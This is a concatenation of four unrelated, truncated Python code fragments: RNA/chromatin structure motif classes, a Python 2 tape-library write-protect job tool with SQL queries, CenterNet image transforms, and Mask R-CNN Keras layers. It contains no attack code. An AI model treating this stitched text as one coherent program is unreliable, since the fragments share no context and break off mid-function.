find_ctcf_islands; warning ctcf ij(14,16) --> proximal ligation (j(16) - i(14) = 2)
wyspa: [(12, 16), (14, 16)]
dGh( -7.76) vs best_dG( -3.66)
-- island generates more negative free energy
full island: zone( [(12, 14), (14, 16)] )
wyspa( [(12, 16), (14, 16)] )
joinW( [] )
dG -7.760
dG_best -3.664
ddG -4.096
found 2 CTCF island
ERROR(Motif(12,16)): unrecognized linkage for type W.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
"""
self.branching = [(i,j)]
else:
print ("ERROR(Motif(%d,%d)): unrecognized linkage for type %s." \
% (i, j, ctp))
sys.exit(1)
#
#
self.base = (i,j) # the base reference point
self.pk = pk
# contains a list of ordered pairs for the linkage stem(s),
# e.g., [( 7,20), ( 8,19), ( 9,18), (10,16)]
self.wyspa = wyspa # contains a list; e.g., [(38, 43), (40, 43)]
#
#
def get_base(self):
tp = self.Ob
if tp == None:
bonds = []
if self.ctp == 'P' or self.ctp == 'J':
# J and P do not have a bond at the base
bonds = self.branching
else:
# B, I, K, and M have a bond at the base, and W is
# effectively a cluster of bonds, on of which outlines the
# entire structure
bonds = [self.base]
return bonds
#
elif tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop":
return self.Ob.get_base()
else:
print ("Motif error(get base)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_branches(self):
tp = self.Ob
if tp == None:
jj = []
if not (self.ctp == 'B' or self.ctp == 'X'):
for jjk in self.branching:
jj += [jjk]
#
#
return jj
elif tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop":
return self.Ob.get_branches()
else:
print ("Motif error(get_branches): ", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_stem(self):
if self.Ob == None:
print ("ERROR: Stem ijt(%d,%d) not defined!" % (self.base[0], self.base[1]))
print (self.show_Motif())
sys.exit(1)
else:
return self.Ob.get_stem()
#
#
def get_Vij(self):
tp = self.Ob
if tp == None:
"""
print ("Vij is not set for %s, ctp(%s), btp(%s)" \
% (self.base, self.ctp, self.btp))
sys.exit(1)
"""
return self.Vij
elif (tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop"):
return self.Ob.Vij
else:
print ("Motif error(get_Vij)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_ctp(self):
tp = self.Ob
if tp == None:
"""
print ("ctp is not set for %s, ctp(%s), btp(%s)" \
% (self.base, self.ctp, self.btp))
sys.exit(1)
"""
return self.ctp
elif (tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop"):
return self.Ob.ctp
else:
print ("Motif error(get_ctp)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
def get_btp(self):
tp = self.Ob
if tp == None:
"""
print ("btp is not set for %s, ctp(%s), btp(%s)" \
% (self.base, self.ctp, self.btp))
sys.exit(1)
"""
return self.btp
elif (tp.name == "Stem" or tp.name == "MBL" or tp.name == "XLoop"):
return self.Ob.btp
else:
print ("Motif error(get_btp)", self.base)
print (type(self.Ob))
sys.exit(0)
#
#
def get_pks(self):
return self.pk # pk contains a list of links (pairs)
#
def get_wyspa(self):
return self.wyspa # wyspa contains a list of interaction points
#
def show_Motif(self):
if self.Ob == None:
return self.base, self.ctp, self.btp, self.Vij, self.branching, self.pk, self.wyspa
elif self.Ob.name == "Stem":
return self.Ob.disp_Stem()
elif self.Ob.name == "MBL":
return self.Ob.disp_MBL()
elif self.Ob.name == "XLoop":
return self.Ob.disp_XLoop()
else:
print ("Motif error(show_Motif)", self.base)
print (type(self.Ob))
print (self.Ob)
sys.exit(0)
#
#
#
# This carries the fundamental information that is needed to construct
# the various "secondary structure" elements in this approach.
class Link:
# #############################################################
# 190618; this should now take on the functions that we have
# defined in Motif. Right now, we are in transition, but I think
# this is where the operations should occur, not in the current
# "Motif". The classes that actually should be "motif" are Stem,
# MBL, XLoop, PseudoKnot, MultiPair, etc. and then we use the
# tools currently in Motif to process these functions.
# #############################################################
def __init__(self, i, j, Vij, ctp, btp, branching, | |
setting."
print "<association>:<object> temporarily override default association for <object>"
print
print "EXAMPLE:"
print "operation.py create write_protect_on WP3 CAP3: VO2093 VO2094 VO2095 VO2096 VO2097 VO2098 VO2099 VO2152 VO2154 VO2195 VO2196 VO2197 VO2198 VO2199 VO2203 VO2206 VO2207 VO2208 VO2209 VO2211 VO2213 CAP4: VO2224 VO2225 VO2226 VO2227 VO2245 VO2246 VO2252 VO2253 VO2254 VO2256 VO2257 VO2258 VO2259 VO2501 VO2532 VO2533 VO2534 VO2540 VO2541 VO2542 VO2544"
elif topic == "list":
print
print "operation.py list [all|open|finished|closed|completed|<job>+|has <object>]"
print
print "all: list all jobs"
print "open: list all open (not closed) jobs"
print "finished|closed|completed: list all completed jobs. finished|closed|completed are the same thing"
print "<job>+ : list named jobs"
print "has <object>: list all jobs that have <object> as an argument"
elif topic == "show":
print
print "operation.py show <job>+"
print
print "show details of <job>s in the list. <job> is addressed by its unique name"
elif topic == "current":
print
print "operation.py current <job>+"
print
print "show the current task of <job>."
print "A current task is one that has stared but its next task has not started"
print "A job can have at most one such task at any time"
print "in case of a not yet started job, current task is task 0"
print "in case of a finished job, current task is the last task"
elif topic == "next":
print
print "operation.py next <job>+"
print
print "show next task of <job>"
print "next task is one that has not started and its previous task has finished."
print "in case of a have-not-started job, next task is the first task."
print "in case of a finished job, next task is task 0"
elif topic == "start":
print
print "operation.py start <job> [<arg>]"
print
print "start the next task of <job> with optional argument"
print "next task can start only if current task has finished"
print
print "EXAMPLE:"
print "operation.py start STKWP3 <help_desk_ticket_id>"
elif topic == "finish":
print
print "operation.py finish <job> [<result>]"
print
print "finish current task of <job> with optional <result>"
print "EXAMPLE:"
print "operation.py finish STKWP3 DONE"
elif topic == "delete":
print
print "operation.py delete <job>+ [sincerely]"
print
print "delete <job> in the list"
print "this is a dangerous command, use with extra care"
print '<job>s will not be deleted unless "sincerely" is specified at the end'
elif topic == "find" or topic == "locate":
print
print "operation.py find|locate <object>+"
print
print "list the jobs that have <object> as an argument"
elif topic == "find+" or topic == "locate+":
print
print "operation.py find+|locate+ <object>+"
print
print "same as find|locate but show details of the jobs"
elif topic == "recommend_write_protect_on" or topic == "recommend_write_protect_off":
print
print "operation.py recommend_write_protect_on [<library_list>] [limit <n>]"
print "operation.py recommend_write_protect_off [<library_list>] [limit <n>]"
print
print "list recommended volumes for write protect tab flipping on/off"
print
print "<library_list> is a list of media types separated by comma ','"
print "when <library_list> is omitted, the default list takes place"
print
print "with 'limit <n>', it only lists, at most, first <n> volumes for the job"
print "otherwise, it lists all"
print
print "EXAMPLES:"
print "operation.py recommend_write_protect_on"
print "operation.py recommend_write_protect_on 9940,CD-9940B"
print "operation.py recommend_write_protect_on limit 100"
print "operation.py recommend_write_protect_on 9940,CD-9940B limit 100"
print "operation.py recommend_write_protect_off"
print "operation.py recommend_write_protect_off 9940,CD-9940B"
print "operation.py recommend_write_protect_off limit 100"
print "operation.py recommend_write_protect_off 9940,CD-9940B limit 100"
elif topic == "auto_write_protect_on" or topic == "auto_write_protect_off":
print
print "operation.py auto_write_protect_on [<library_list>] [no_limit]"
print "operation.py auto_write_protect_off [<library_list>] [no_limit]"
print
print "from recommended list, create a job for write protect tab flipping on/off"
print "and generate a helpdesk ticket automatically"
print
print "<library_list> is a list of media types separated by comma ','"
print
print "there is a default limit of 10 caps (220 volume)"
print "with 'no_limit', it generates everything in one ticket"
print
print "EXAMPLES:"
print "operation.py auto_write_protect_on"
print "operation.py auto_write_protect_on 9940,CD-9940B"
print "operation.py auto_write_protect_on no_limit"
print "operation.py auto_write_protect_on 9940,CD-9940B no_limit"
print "operation.py auto_write_protect_off"
print "operation.py auto_write_protect_off 9940,CD-9940B"
print "operation.py auto_write_protect_off no_limit"
print "operation.py auto_write_protect_off 9940,CD-9940B no_limit"
elif topic == 'auto_close_all':
print
print "operation.py auto_close_all"
print
print "try to close all finished open jobs on this cluster"
print
print "this command is meant for script/cronjob or experts!!"
else:
print "don't know anything about %s"%(topic)
print
help()
# even(i) -- True is i is an even number
def even(i):
return int(i/2)*2 == i
# get_caps_per_ticket(lib_type) -- determine caps per ticket
def caps_per_ticket(lib_type):
if lib_type == '9310':
return 10
elif lib_type == 'aml2':
return 7
elif lib_type[:4] == '8500':
return 5
else:
return None
def volumes_per_cap(lib_type):
if lib_type == '9310':
return 21
elif lib_type == 'aml2':
return 30
elif lib_type[:4] == '8500':
return 39
else:
return None
# same_tape_library(libs) -- check if all library are using the same robot
def same_tape_library(libs):
l = libs.split(",")
t = library_type(cluster, l[0])
if len(l) > 1:
for i in l[1:]:
if library_type(cluster, i) != t:
return None
return t
# dump() -- dump all global variables
def dump():
for i in __builtins__.globals().keys():
if i[:2] == '__': # internal
continue
if type(__builtins__.globals()[i]) == type(1) or \
type(__builtins__.globals()[i]) == type(1.0) or \
type(__builtins__.globals()[i]) == type("") or \
type(__builtins__.globals()[i]) == type({}) or \
type(__builtins__.globals()[i]) == type([]):
print i, '=',
pprint.pprint(__builtins__.globals()[i])
# complex operations
# CAPS_PER_TICKET = 10
# VOLUMES_PER_CAP = 21
def recommend_write_protect_job(library=DEFAULT_LIBRARIES, limit=None):
# check if they are of the same robot
lt = same_tape_library(library)
if not lt:
print "Error: %s are not the same robot"%(library)
return {}
CAPS_PER_TICKET = caps_per_ticket(lt)
VOLUMES_PER_CAP = volumes_per_cap(lt)
# take care of limit:
# if limit == None: limit = default
# if limit == 0: no limit
# if limit == n, let it be n
if limit == None: # use default
limit = CAPS_PER_TICKET * VOLUMES_PER_CAP
if lt == 'aml2':
op = 'aWP'
elif lt == '8500GS':
op = 'rWP'
elif lt == '8500G1':
op = 'sWP'
elif lt == '8500F1':
op = 'tWP'
else:
op = 'WP'
# get max cap number
n = get_max_cap_number(cluster, op) + 1
# get exclusion list:
q = "select object from object, job \
where \
object.job = job.id and \
job.finish is null;"
if debug:
print q
excl = db.query_getresult(q)
# take care of libraries
lb = library.split(",")
lbs = "(library = '%s'"%(lb[0])
for i in lb[1:]:
lbs = lbs + " or library = '%s'"%(i)
lbs = lbs+")"
q = "" # to make lint happy
if excl:
exclusion = "'%s'"%(excl[0][0])
for i in excl[1:]:
exclusion = exclusion+','+"'%s'"%(i[0])
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'full' and \
write_protected != 'y' and \
not storage_group in (select * from no_flipping_storage_group) and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not file_family like '%%-MIGRATION%%' and \
not label in (%s) \
order by si_time_1 asc"%(lbs, exclusion)
else:
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'full' and \
write_protected != 'y' and \
not storage_group in (select * from no_flipping_storage_group) and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not file_family like '%%-MIGRATION%%' \
order by si_time_1 asc "%(lbs)
if limit:
q = q + ' limit %d;'%(limit)
else:
q = q + ';'
if debug:
print q
res = edb.query_getresult(q)
job = {}
j = 0
cap_n = n
for i in range(len(res)):
if j == 0:
job[cap_n] = []
job[cap_n].append(res[i][0])
j = j + 1
if j >= VOLUMES_PER_CAP:
j = 0
cap_n = cap_n + 1
return job
def recommend_write_permit_job(library=DEFAULT_LIBRARIES, limit=None):
# check if they are of the same robot
lt = same_tape_library(library)
if not lt:
print "Error: %s are not the same robot"%(library)
return {}
CAPS_PER_TICKET = caps_per_ticket(lt)
VOLUMES_PER_CAP = volumes_per_cap(lt)
# take care of limit:
# if limit == None: limit = default
# if limit == 0: no limit
# if limit == n, let it be n
if limit == None: # use default
limit = CAPS_PER_TICKET * VOLUMES_PER_CAP
if lt == 'aml2':
op = 'aWE'
elif lt == '8500GS':
op = 'rWE'
elif lt == '8500G1':
op = 'sWE'
elif lt == '8500F1':
op = 'tWE'
else:
op = 'WE'
# get max cap number
n = get_max_cap_number(cluster, op) + 1
# get exclusion list:
q = "select object from object, job \
where \
object.job = job.id and \
job.finish is null;"
if debug:
print q
excl = db.query_getresult(q)
# take care of libraries
lb = library.split(",")
lbs = "(library = '%s'"%(lb[0])
for i in lb[1:]:
lbs = lbs + " or library = '%s'"%(i)
lbs = lbs+")"
q = "" # to make lint happy
if excl:
exclusion = "'%s'"%(excl[0][0])
for i in excl[1:]:
exclusion = exclusion+','+"'%s'"%(i[0])
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'none' and \
write_protected != 'n' and \
not storage_group in (select * from no_flipping_storage_group) and \
not file_family like '%%-MIGRATION%%' and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not label in (%s) \
order by label"%(lbs, exclusion)
else:
q = "select label from volume where \
%s and \
system_inhibit_0 = 'none' and \
system_inhibit_1 = 'none' and \
write_protected != 'n' and \
not storage_group in (select * from no_flipping_storage_group) and \
not storage_group||'.'||file_family in \
(select storage_group||'.'||file_family \
from no_flipping_file_family) and\
not file_family like '%%-MIGRATION%%' \
order by label "%(lbs)
if limit:
q = q + " limit %d;"%(limit)
else:
q = q + ";"
if debug:
print q
res = edb.query_getresult(q)
job = {}
j = 0
cap_n = n
for i in range(len(res)):
if j == 0:
job[cap_n] = []
job[cap_n].append(res[i][0])
j = j + 1
if j >= VOLUMES_PER_CAP:
j = 0
cap_n = cap_n + 1
return job
# make_cap_args(d) -- make arguments from a dictionary
def make_cap_args(d):
res = []
for k in d.keys():
if d[k]:
res.append('CAP' + str(k) + ':')
for i in d[k]:
res.append(i)
return res
# make_cap(list)
def make_cap(l, library_type='9310', cap_n = 0):
cap_script | |
gaussian[radius - top:radius + bottom, radius -
left:radius + right]
if min(masked_gaussian.shape) > 0 and min(
masked_heatmap.shape) > 0: # TODO debug
np.maximum(masked_heatmap, masked_gaussian * k, out=masked_heatmap)
return heatmap
def get_dir(self, src_point, rot_rad):
sn, cs = np.sin(rot_rad), np.cos(rot_rad)
src_result = [0, 0]
src_result[0] = src_point[0] * cs - src_point[1] * sn
src_result[1] = src_point[0] * sn + src_point[1] * cs
return src_result
def get_3rd_point(self, a, b):
direct = a - b
return b + np.array([-direct[1], direct[0]], dtype=np.float32)
def get_affine_transform(self,
center,
scale,
rot,
output_size,
shift=np.array([0, 0], dtype=np.float32),
inv=0):
if isinstance(scale, torch.Tensor):
scale = scale.cpu().squeeze().numpy()
if isinstance(center, torch.Tensor):
center = center.cpu().squeeze().numpy()
if not isinstance(scale, np.ndarray) and not isinstance(scale, list):
scale = np.array([scale, scale], dtype=np.float32)
scale_tmp = scale
src_w = scale_tmp[0]
dst_w = output_size[0]
dst_h = output_size[1]
if isinstance(dst_w, torch.Tensor):
dst_w = dst_w.cpu().squeeze().numpy()
if isinstance(dst_h, torch.Tensor):
dst_h = dst_h.cpu().squeeze().numpy()
rot_rad = np.pi * rot / 180
src_dir = self.get_dir([0, src_w * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :] = center + scale_tmp * shift
src[1, :] = center + src_dir + scale_tmp * shift
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir
src[2:, :] = self.get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = self.get_3rd_point(dst[0, :], dst[1, :])
if inv:
trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return trans
def affine_transform(self, pt, t):
new_pt = np.array([pt[0], pt[1], 1.], dtype=np.float32).T
new_pt = np.dot(t, new_pt)
return new_pt[:2]
def get_border(self, border, size):
i = 1
while size - border // i <= border // i:
i *= 2
return border // i
def __call__(self, results):
# apply transforms
flip = True if np.random.rand() < self.flip_ratio else False
# randomly sample a scale
img = results['img']
height, width = img.shape[0], img.shape[1]
img_shape = img.shape
c = np.array([img.shape[1] / 2., img.shape[0] / 2.],
dtype=np.float32)
if self.keep_ratio:
input_h = (height | self.size_divisor) + 1
input_w = (width | self.size_divisor) + 1
s = np.array([input_w, input_h], dtype=np.float32)
else:
s = max(img.shape[0], img.shape[1]) * 1.0
input_h, input_w = self.img_scales[0]
s = s * np.random.choice(np.arange(0.6, 1.4, 0.1))
w_border = self.get_border(128, img.shape[1])
h_border = self.get_border(128, img.shape[0])
c[0] = np.random.randint(
low=w_border, high=img.shape[1] - w_border)
c[1] = np.random.randint(
low=h_border, high=img.shape[0] - h_border)
if flip:
img = img[:, ::-1, :]
c[0] = width - c[0] - 1
trans_input = self.get_affine_transform(c, s, 0, [input_w, input_h])
inp = cv2.warpAffine(
img, trans_input, (input_w, input_h), flags=cv2.INTER_LINEAR)
pad_shape = inp.shape
scale_factor = np.array([(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0]),
(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0])],
dtype=np.float32)
#inp = inp[:,:,::-1]
inp = (inp.astype(np.float32) / 255.)
self.color_aug(self._data_rng, inp, self._eig_val, self._eig_vec)
mean = np.array(
self.img_norm_cfg['mean'], dtype=np.float32).reshape(1, 1, 3)
std = np.array(
self.img_norm_cfg['std'], dtype=np.float32).reshape(1, 1, 3)
inp = (inp - mean) / std
inp = inp.transpose(2, 0, 1)
img = inp.copy()
# TODO: change to down_ratio
output_h = input_h // 4
output_w = input_w // 4
trans_output = self.get_affine_transform(c, s, 0, [output_w, output_h])
hm = np.zeros((self.num_classes, output_h, output_w),
dtype=np.float32)
wh = np.zeros((self.max_objs, 2), dtype=np.float32)
reg = np.zeros((self.max_objs, 2), dtype=np.float32)
ind = np.zeros((self.max_objs), dtype=np.int64)
reg_mask = np.zeros((self.max_objs), dtype=np.uint8)
ann = results['ann_info']
for k in range(min(len(ann['labels']), self.max_objs)):
bbox = ann['bboxes'][k]
cls_id = ann['labels'][k] - 1
if flip:
bbox[[0, 2]] = width - bbox[[2, 0]] - 1
# tranform bounding box to output size
bbox[:2] = self.affine_transform(bbox[:2], trans_output)
bbox[2:] = self.affine_transform(bbox[2:], trans_output)
bbox[[0, 2]] = np.clip(bbox[[0, 2]], 0, output_w - 1)
bbox[[1, 3]] = np.clip(bbox[[1, 3]], 0, output_h - 1)
h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]
if h > 0 and w > 0:
# populate hm based on gd and ct
radius = self.gaussian_radius((math.ceil(h), math.ceil(w)))
radius = max(0, int(radius))
ct = np.array([(bbox[0] + bbox[2]) / 2,
(bbox[1] + bbox[3]) / 2],
dtype=np.float32)
ct_int = ct.astype(np.int32)
self.draw_umich_gaussian(hm[cls_id], ct_int, radius)
wh[k] = 1. * w, 1. * h
ind[k] = ct_int[1] * output_w + ct_int[0]
reg[k] = ct - ct_int
reg_mask[k] = 1
img_info = results['img_info']
ori_shape = (img_info['height'], img_info['width'], 3)
img_meta = dict(
ori_shape=ori_shape,
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
flip=flip)
data = dict(
img=DC(to_tensor(img), stack=True),
img_meta=DC(img_meta, cpu_only=True),
gt_bboxes=DC(to_tensor(results['gt_bboxes'])))
data['gt_labels'] = DC(to_tensor(results['gt_labels']))
data['hm'] = DC(to_tensor(hm), stack=True)
data['reg_mask'] = DC(
to_tensor(reg_mask).unsqueeze(1), stack=True, pad_dims=1)
data['ind'] = DC(
to_tensor(ind).unsqueeze(1), stack=True, pad_dims=1)
data['wh'] = DC(to_tensor(wh), stack=True, pad_dims=1)
data['reg'] = DC(to_tensor(reg), stack=True, pad_dims=1)
return data
@PIPELINES.register_module
class CtdetTestTransforms(object):
def __init__(self,
size_divisor,
keep_ratio,
input_res,
img_norm_cfg):
self.size_divisor = size_divisor
self.keep_ratio = keep_ratio
self.input_res = input_res
self.img_norm_cfg = img_norm_cfg
def get_dir(self, src_point, rot_rad):
sn, cs = np.sin(rot_rad), np.cos(rot_rad)
src_result = [0, 0]
src_result[0] = src_point[0] * cs - src_point[1] * sn
src_result[1] = src_point[0] * sn + src_point[1] * cs
return src_result
def get_3rd_point(self, a, b):
direct = a - b
return b + np.array([-direct[1], direct[0]], dtype=np.float32)
def get_affine_transform(self,
center,
scale,
rot,
output_size,
shift=np.array([0, 0], dtype=np.float32),
inv=0):
if isinstance(scale, torch.Tensor):
scale = scale.cpu().squeeze().numpy()
if isinstance(center, torch.Tensor):
center = center.cpu().squeeze().numpy()
if not isinstance(scale, np.ndarray) and not isinstance(scale, list):
scale = np.array([scale, scale], dtype=np.float32)
scale_tmp = scale
src_w = scale_tmp[0]
dst_w = output_size[0]
dst_h = output_size[1]
if isinstance(dst_w, torch.Tensor):
dst_w = dst_w.cpu().squeeze().numpy()
if isinstance(dst_h, torch.Tensor):
dst_h = dst_h.cpu().squeeze().numpy()
rot_rad = np.pi * rot / 180
src_dir = self.get_dir([0, src_w * -0.5], rot_rad)
dst_dir = np.array([0, dst_w * -0.5], np.float32)
src = np.zeros((3, 2), dtype=np.float32)
dst = np.zeros((3, 2), dtype=np.float32)
src[0, :] = center + scale_tmp * shift
src[1, :] = center + src_dir + scale_tmp * shift
dst[0, :] = [dst_w * 0.5, dst_h * 0.5]
dst[1, :] = np.array([dst_w * 0.5, dst_h * 0.5], np.float32) + dst_dir
src[2:, :] = self.get_3rd_point(src[0, :], src[1, :])
dst[2:, :] = self.get_3rd_point(dst[0, :], dst[1, :])
if inv:
trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return trans
def __call__(self, results):
img = results['img']
scale = results['scale'] # (1,1)
flip = results['flip']
height, width = img.shape[0:2] # (928, 1650, 3)
new_height = int(height * scale[0])
new_width = int(width * scale[1])
img_shape = (new_height, new_width)
if self.keep_ratio:
inp_height = (new_height | self.size_divisor) + 1
inp_width = (new_width | self.size_divisor) + 1
c = np.array([new_width // 2, new_height // 2],
dtype=np.float32)
s = np.array([inp_width, inp_height], dtype=np.float32)
else:
inp_height, inp_width = self.input_res[0], self.input_res[1]
c = np.array([new_width / 2., new_height / 2.], #center
dtype=np.float32)
s = max(height, width) * 1.0 #1650
#print(inp_height, inp_width) #(512, 800)
trans_input = self.get_affine_transform(c, s, 0,
[inp_width, inp_height])
resized_image = cv2.resize(img, (new_width, new_height))
#print(resized_image.shape)
inp_image = cv2.warpAffine(
resized_image,
trans_input, (inp_width, inp_height),
flags=cv2.INTER_LINEAR)
#cv2.imwrite('/data1/centernet/1.jpg', inp_image)
#img meta calculations
#inp_image = cv2.resize(img, (inp_width, inp_height))
pad_shape = inp_image.shape[:2]
scale_factor = np.array([(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0]),
(pad_shape[1] / img_shape[1]),
(pad_shape[0] / img_shape[0])],
dtype=np.float32) #[0.4848485 0.4827586 0.4848485 0.4827586]
mean = np.array(
self.img_norm_cfg['mean'],
dtype=np.float32).reshape(1, 1, 3)
std = np.array(
self.img_norm_cfg['std'],
dtype=np.float32).reshape(1, 1, 3)
#cv2.imwrite('/data1/centernet/1.jpg', inp_image)
#inp_image = inp_image[:,:,::-1]
inp_image = ((inp_image / 255. - mean) / std).astype(
np.float32)
_img = inp_image.transpose(2, 0, 1)
if flip:
_img = _img[:, :, ::-1].copy()
if 'img_info' not in results.keys():
img_info = {'height': height, 'width': width}
else:
img_info = results['img_info']
_img_meta = dict(
ori_shape=(img_info['height'], img_info['width'], 3),
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
ctdet_c=c,
ctdet_s=s,
ctdet_out_height=inp_height // 4,
ctdet_out_width=inp_width // 4,
flip=flip)
data = dict(img=_img, img_meta=DC(_img_meta, cpu_only=True))
return data
class Albu(object):
def __init__(self,
transforms,
bbox_params=None,
keymap=None,
update_pad_shape=False,
skip_img_without_anno=False):
"""
Adds custom transformations from Albumentations lib.
Please, visit `https://albumentations.readthedocs.io`
to get more information.
transforms (list): list of albu transformations
bbox_params (dict): bbox_params for albumentation `Compose`
keymap (dict): contains {'input key':'albumentation-style key'}
skip_img_without_anno (bool): whether to skip the image
if no ann left after aug
"""
self.transforms = transforms
self.filter_lost_elements = False
self.update_pad_shape = update_pad_shape
self.skip_img_without_anno = skip_img_without_anno
# A simple workaround to remove masks without boxes
if (isinstance(bbox_params, dict) and 'label_fields' in bbox_params
and 'filter_lost_elements' in bbox_params):
self.filter_lost_elements = True
self.origin_label_fields = bbox_params['label_fields']
bbox_params['label_fields'] = ['idx_mapper']
del bbox_params['filter_lost_elements']
self.bbox_params = (
self.albu_builder(bbox_params) if bbox_params else None)
self.aug = Compose([self.albu_builder(t) for t in self.transforms],
bbox_params=self.bbox_params)
if not keymap:
self.keymap_to_albu = {
'img': 'image',
'gt_masks': 'masks',
'gt_bboxes': 'bboxes'
}
else:
self.keymap_to_albu = | |
<reponame>malfonsoNeoris/maskrcnn_tf2
import efficientnet.keras as efn
import numpy as np
import tensorflow as tf
from classification_models.keras import Classifiers
from common import utils
from tensorflow.keras import layers as tfl
# Subclassed tf.keras API
@tf.keras.utils.register_keras_serializable()
class NormBoxesLayer(tfl.Layer):
"""Converts boxes from pixel coordinates to normalized coordinates.
boxes: [..., (y1, x1, y2, x2)] in pixel coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in normalized coordinates
"""
def __init__(self, name='norm_boxes', **kwargs):
super(NormBoxesLayer, self).__init__(name=name, **kwargs)
self.shift = np.array((0., 0., 1., 1.))
self.const = np.array(1.0)
def build(self, input_shape):
self.built = True
super(NormBoxesLayer, self).build(input_shape)
def call(self, inputs, **kwargs):
# assert inputs is tuple
boxes, shape = inputs
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - self.const
return tf.math.divide(boxes - self.shift, scale)
def get_config(self):
config = super(NormBoxesLayer, self).get_config()
config.update({"shift": self.shift, 'const': self.const})
return config
@tf.keras.utils.register_keras_serializable()
class ResnetConvBlock(tfl.Layer):
def __init__(self, filters, kernel_size=3, strides=(2, 2), use_bias=True,
train_bn=True, name='resnet_conv_block', **kwargs):
"""
Args:
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
strides: strides for shortcut
use_bias: Boolean. To use or not use a bias in conv layers.
name: block name
**kwargs:
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
"""
super(ResnetConvBlock, self).__init__(name=name, **kwargs)
self.filters = filters
self.kernel_size = kernel_size
self.strides = strides
filters1, filters2, filters3 = self.filters
self.conv2a = tf.keras.layers.Conv2D(filters1, kernel_size=(1, 1), strides=strides, use_bias=use_bias)
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters2, kernel_size=kernel_size, padding='same', use_bias=use_bias)
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2c = tf.keras.layers.Conv2D(filters3, kernel_size=(1, 1), use_bias=use_bias)
self.bn2c = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv_shortcut = tf.keras.layers.Conv2D(filters3, kernel_size=(1, 1), strides=strides, use_bias=use_bias)
self.bn2_sc = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResnetConvBlock, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x = tf.nn.relu(x)
x = self.conv2c(x)
x = self.bn2c(x)
shortcut = self.conv_shortcut(inputs)
shortcut = self.bn2_sc(shortcut)
x += shortcut
return tf.nn.relu(x)
def get_config(self):
config = super(ResnetConvBlock, self).get_config()
config.update({'filters': self.filters, 'kernel_size': self.kernel_size, 'strides': self.strides})
return config
@tf.keras.utils.register_keras_serializable()
class ResnetConvBlockSmall(tfl.Layer):
def __init__(self, filter_size, kernel_size=3, strides=(2, 2), use_bias=True,
train_bn=True, name='resnet_conv_block_small', **kwargs):
"""
Block for resnet18 and resnet34
Args:
filter_size:
kernel_size:
strides:
use_bias:
train_bn:
name:
**kwargs:
"""
super(ResnetConvBlockSmall, self).__init__(name=name, **kwargs)
self.filter_size = filter_size
self.kernel_size = kernel_size
self.strides = strides
self.conv2a = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size, strides=strides,
use_bias=use_bias, padding='same')
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size,
use_bias=use_bias, padding='same')
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv_shortcut = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=(1, 1), strides=strides,
use_bias=use_bias)
self.bn2_sc = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResnetConvBlockSmall, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x = tf.nn.relu(x)
shortcut = self.conv_shortcut(inputs)
shortcut = self.bn2_sc(shortcut)
x += shortcut
return tf.nn.relu(x)
def get_config(self):
config = super(ResnetConvBlockSmall, self).get_config()
